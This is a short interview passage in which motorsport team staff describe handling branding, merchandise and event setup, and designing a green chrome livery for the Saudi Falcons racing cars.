“I’m the motorsport marketing specialist in the team. Day-to-day I handle all the merchandise and anything regarding the branding and team image. On the internet and in real life, on the cars, in the pit garage, whatever – this is what I handle.
“In events or races like this I don’t have a particular job description – I try to do everything! Whatever the team needs or I need to do to finish the job, I’ll do it. So for example I sorted out the branding and stickers on the car, made sure all the teams were wearing what they should be, as well as the mechanics with Saudi Falcons branding. I also supervised the set up of the garage, the team lounge, the motor home and the live streaming operation. I’m a busy man!

I’ve been doing liveries for about 19 years now. Back in 2010 I did the Team Need for Speed livery and they won the Dubai race in 2011. Schubert put me in touch with Faisal when he was looking for someone.
“The first thing is to try and get into the team’s head, find out what they want as the customer is always first. Faisal has a good head on him, design-wise, and the Saudi Falcons graphic is strong but we needed to make it punch a bit more compared to the previous cars. Then we had to decide whether to have a busy or clean livery. In this instance we wanted to do something that was a bit different so that it would stand out from the crowd. I remember from being here before what the light was like at sunset and dawn, and that gave me the idea for the green chrome.
“A good livery is very important. Some teams are very good at using it for marketing and clothing and building a good identity and others aren’t. It’s very useful for sponsors and corporate identity.
